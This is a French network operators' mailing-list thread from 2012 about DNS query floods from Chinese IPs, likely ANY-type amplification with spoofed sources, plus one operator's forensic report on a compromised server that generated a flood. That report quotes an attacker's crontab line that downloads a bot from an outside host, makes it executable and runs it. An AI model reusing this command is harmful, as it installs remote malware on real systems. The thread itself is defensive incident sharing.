Re: Re: [FRnOG] [TECH] Requetes DNS depuis la chine
Pour information, nous avons subi un probleme connexe hier matin (2012-03-16), mais cette fois nous etions la source du flood ! un de nos serveurs a été usurpé, il a provoqué de 7H30 à 10H (heure a laquelle nous l'avons debranché ) une moyenne de 850Mbps sur notre lien Giga vers l'Internet . ci-dessous un aperçu de capture tcpdump sur notre sonde: 09:24:50.787414 IP 9.151.86.36.20695 212.14.226.115.domain: 2570 inv_q [b23=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] 09:24:50.787417 IP 17.9.161.108.jtag-server 212.14.226.115.domain: 2570 inv_q [b23=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] 09:24:50.787419 IP 174.161.113.91.npp 212.14.226.115.domain: 2570 inv_q [b23=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] 09:24:50.787421 IP 216.91.179.98.53745 212.14.226.115.domain: 2570 inv_q [b23=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] 09:24:50.787423 IP 40.151.196.109.42843 212.14.226.115.domain: 2570 inv_q [b23=0xa0a] [2570q] [2570a] [2570n] [2570au][|domain] les sources IP aléatoires du tcpdump montrent que la source est spoofée . un rapide forensic sur le serveur incriminé, nous a montré la présence d'un kit -rw-r--r-- 1 1000 1000 1680 Jan 28 04:13 Makefile -rw-r--r-- 1 1000 1000 2692 Jan 28 04:15 fix.pl -rw-r--r-- 1 1000 1000 19774 Jan 28 04:16 pnscan.c -rw-r--r-- 1 root root 16398 Feb 4 17:58 system -rw-r--r-- 1 root root 35364 Feb 4 18:32 pnscan.o -rw-r--r-- 1 root root 6836 Feb 4 18:32 bm.o -rw-r--r-- 1 root root 1504 Feb 4 18:32 version.o -rw-r--r-- 1 root root 35171 Feb 19 02:32 kat.c -rwxr-xr-x 1 root root 28865 Feb 22 19:21 javas -rwxr-xr-x 1 root root 16068 Feb 22 19:21 pns un process javas provoquait le flood: # ps auwx USER PID %CPU %MEMVSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 2156 672 ?Ss Feb09 0:00 init [3] root 1617 0.0 0.0 2044 700 ?SFeb22 0:08 java root 7540 53.5 0.0 0 0 ?Z07:33 98:27 [javas] defunct + une contab @weekly wget http://stablehost.us/bots/regular.bot -O /root/xpath.so;chmod +x /root/xpath.so;/root/xpath.so stat sur l'interface reseau, +2 milliards de paquets ! RX packets:2251383828 errors:0 dropped:0 overruns:0 frame:0 TX packets:7973319 errors:0 dropped:1433690 overruns:0 carrier:0 collisions:0 lg file transmission:0 RX bytes:3217831605194 (2.9 TiB) TX bytes:739146885 (704.9 MiB) La machine est maintenant hors service, je reste quand meme surpris du debit généré !. --- Liste de diffusion du FRnOG http://www.frnog.org/
RE: [FRnOG] [TECH] Requetes DNS depuis la chine
Il n'y a rien de veritablement suspect outre la récurrence. Et on parle de requete DNS, donc de quelques centaines de kb/s. C'est d'ailleurs ce qui est etonnant si c'est une attaque. Pour que cela puisse avoir un impact sur le service, il faudrait sans doute multiplier par 50 ou 100 le nombre de requetes, et encore. La c'est juste suffisant pour que cela soit visible au niveau des statistiques Je veux bien tout passer en ipv6 mais vu que l'on a que 3% de requetes dns en IPV6, ca risque de pas trop passer :) Christophe -Message d'origine- De : frnog-requ...@frnog.org [mailto:frnog-requ...@frnog.org] De la part de Benjamin BILLON Envoyé : vendredi 16 mars 2012 01:06 À : 'frnog-t...@frnog.org' Objet : Re: [FRnOG] [TECH] Requetes DNS depuis la chine As-tu moyen d'appliquer du traffic shaping d'une quelconque sorte ? Y'a-t-il des requêtes suspectes, ou un pattern reconnaissable ? Le 16/03/2012 01:05, Christophe HUBERT a écrit : Salut, Depuis decembre a peu pres, nos serveurs DNS recoivent un tres grand nombre de requetes depuis la chine. Autant avoir des requetes depuis la chine est normal, autant le nombre et le type de requetes est assez etrange. Depuis decembre donc notre trafic DNS a fortement augmente sur la plage 4h-18h. Au niveau des requetes, on se retrouve a avoir des rushs a partir d'une IP pendant quelques minutes, puis un autre rush a partir d'une autre ip. Pour prendre un exemple, l'ip 121.12.172.233 a effectue aujourd'hui pres de 7 requetes en 10 minutes sur uniquement une vingtaine de domaines (soit entre 1500 et 3000 fois la meme requete par domaine). D'ailleurs, les ips chinoises trustent le top 50 sur nos DNSs depuis le mois de decembre. A priori je ne suis pas le seul (http://dyn.com/active-incident-notification-recent-chinanetany-query-floods/). Comme l'ip change tout le temps et que je ne peux pas bloquer la chine (meme si l'envie me demange), je me retrouve a devoir laisser le trafic se faire. Ca n'impacte de toute facon pas le service plus que ca. Est-ce que quelqu'un d'autre subit ce type d'evenement ? Si oui, vous avez pris des mesures ou vous laissez faire aussi ? Christophe --- Liste de diffusion du FRnOG http://www.frnog.org/ --- Liste de diffusion du FRnOG http://www.frnog.org/ --- Liste de diffusion du FRnOG http://www.frnog.org/
Re: [FRnOG] [TECH] Requetes DNS depuis la chine
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Salut, Salut, Depuis decembre a peu pres, nos serveurs DNS recoivent un tres grand nombre de requetes depuis la chine. Autant avoir des requetes depuis la chine est normal, autant le nombre et le type de requetes est assez etrange. Depuis decembre donc notre trafic DNS a fortement augmente sur la plage 4h-18h. Au niveau des requetes, on se retrouve a avoir des rushs a partir d'une IP pendant quelques minutes, puis un autre rush a partir d'une autre ip. Pour prendre un exemple, l'ip 121.12.172.233 a effectue aujourd'hui pres de 7 requetes en 10 minutes sur uniquement une vingtaine de domaines (soit entre 1500 et 3000 fois la meme requete par domaine). D'ailleurs, les ips chinoises trustent le top 50 sur nos DNSs depuis le mois de decembre. A priori je ne suis pas le seul (http://dyn.com/active-incident-notification-recent-chinanetany-query-floods/). Comme l'ip change tout le temps et que je ne peux pas bloquer la chine (meme si l'envie me demange), je me retrouve a devoir laisser le trafic se faire. Ca n'impacte de toute facon pas le service plus que ca. Est-ce que quelqu'un d'autre subit ce type d'evenement ? Si oui, vous avez pris des mesures ou vous laissez faire aussi ? Oui on a la même chose. On a lancé une mitigation avec notre plateforme arbor (sur un des dns) et on drop le tout en utilisant une contre mesure spécifique aux DNS. On est en train d'analyser le tout avec le SOC de Arbor. Au passage ce problème représente pas loin de 60% des requêtes ! Bref .. Bon vendredi :-) Christophe --- Liste de diffusion du FRnOG http://www.frnog.org/ - -- Nicolas STRINA Jaguar Network Switzerland 5 route de Chene Case Postale 6298 CH - 1211 Geneva 6 More Than Your Hosting Company Tel : +33 4 88 00 65 16 Gsm : +33 6 18 20 49 55 Std : +41 8 40 65 61 11 Fax : +33 4 88 00 65 25 URL: http://www.jaguar-network.ch/ Support 24+7 : supp...@jaguar-network.ch -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) Comment: GPGTools - http://gpgtools.org Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk9i+B4ACgkQhVupqbmzosexewCgtvCvgtzRmulyfQeNiloTbU67 HB4An0xB7VCxMe2HFu/pZxGeM0hWDZoX =0BlX -END PGP SIGNATURE- --- Liste de diffusion du FRnOG http://www.frnog.org/
Re: [FRnOG] [TECH] Requetes DNS depuis la chine
On Thu, Mar 15, 2012 at 05:05:32PM +, Christophe HUBERT wrote: Salut, Depuis decembre a peu pres, nos serveurs DNS recoivent un tres grand nombre de requetes depuis la chine. Autant avoir des requetes depuis la chine est normal, autant le nombre et le type de requetes est assez etrange. Depuis decembre donc notre trafic DNS a fortement augmente sur la plage 4h-18h. Au niveau des requetes, on se retrouve a avoir des rushs a partir d'une IP pendant quelques minutes, puis un autre rush a partir d'une autre ip. Pour prendre un exemple, l'ip 121.12.172.233 a effectue aujourd'hui pres de 7 requetes en 10 minutes sur uniquement une vingtaine de domaines (soit entre 1500 et 3000 fois la meme requete par domaine). D'ailleurs, les ips chinoises trustent le top 50 sur nos DNSs depuis le mois de decembre. A priori je ne suis pas le seul (http://dyn.com/active-incident-notification-recent-chinanetany-query-floods/). Comme l'ip change tout le temps et que je ne peux pas bloquer la chine (meme si l'envie me demange), je me retrouve a devoir laisser le trafic se faire. Ca n'impacte de toute facon pas le service plus que ca. Est-ce que quelqu'un d'autre subit ce type d'evenement ? Si oui, vous avez pris des mesures ou vous laissez faire aussi ? J'ai remarqué sensiblement la même chose sur les DNS de bookmyname tous les jours entre 4h et 16h (paris) . C'est très probablement une attaque par amplification avec uniquement des requêtes ANY qui renvoient un volume bien plus important (au moins SOA + 2 NS + éventuellement MX, A, TXT) que la question. Les IP sources sont très probablement usurpées. tcpdump -v montrait un ttl non constant la dernière fois que j'ai regardé, mais je n'ai pas fait de stats dessus. Contrairement, aux attaques DNS par amplification sur des serveurs récursifs imprudemment ouverts, il n'y a rien à faire sur des serveurs faisant autorité pour les zones utilisées. Plus un serveur gère de zones, plus le volume doit être important et l'attaque ne semble pas focalisée sur quelques domaines. Pour la maso qui utilisent DNSSEC, l'amplification doit être bien plus violente. À noter, que je n'ai pas remarqué d'ipv6 lors de ces attaques. Passer tous les serveurs DNS en ipv6 seulement serait peut-être une solution ... Lolo -- Laurent Frigault --- Liste de diffusion du FRnOG http://www.frnog.org/
Re: [FRnOG] [TECH] Requetes DNS depuis la chine
As-tu moyen d'appliquer du traffic shaping d'une quelconque sorte ? Y'a-t-il des requêtes suspectes, ou un pattern reconnaissable ? Le 16/03/2012 01:05, Christophe HUBERT a écrit : Salut, Depuis decembre a peu pres, nos serveurs DNS recoivent un tres grand nombre de requetes depuis la chine. Autant avoir des requetes depuis la chine est normal, autant le nombre et le type de requetes est assez etrange. Depuis decembre donc notre trafic DNS a fortement augmente sur la plage 4h-18h. Au niveau des requetes, on se retrouve a avoir des rushs a partir d'une IP pendant quelques minutes, puis un autre rush a partir d'une autre ip. Pour prendre un exemple, l'ip 121.12.172.233 a effectue aujourd'hui pres de 7 requetes en 10 minutes sur uniquement une vingtaine de domaines (soit entre 1500 et 3000 fois la meme requete par domaine). D'ailleurs, les ips chinoises trustent le top 50 sur nos DNSs depuis le mois de decembre. A priori je ne suis pas le seul (http://dyn.com/active-incident-notification-recent-chinanetany-query-floods/). Comme l'ip change tout le temps et que je ne peux pas bloquer la chine (meme si l'envie me demange), je me retrouve a devoir laisser le trafic se faire. Ca n'impacte de toute facon pas le service plus que ca. Est-ce que quelqu'un d'autre subit ce type d'evenement ? Si oui, vous avez pris des mesures ou vous laissez faire aussi ? Christophe --- Liste de diffusion du FRnOG http://www.frnog.org/ --- Liste de diffusion du FRnOG http://www.frnog.org/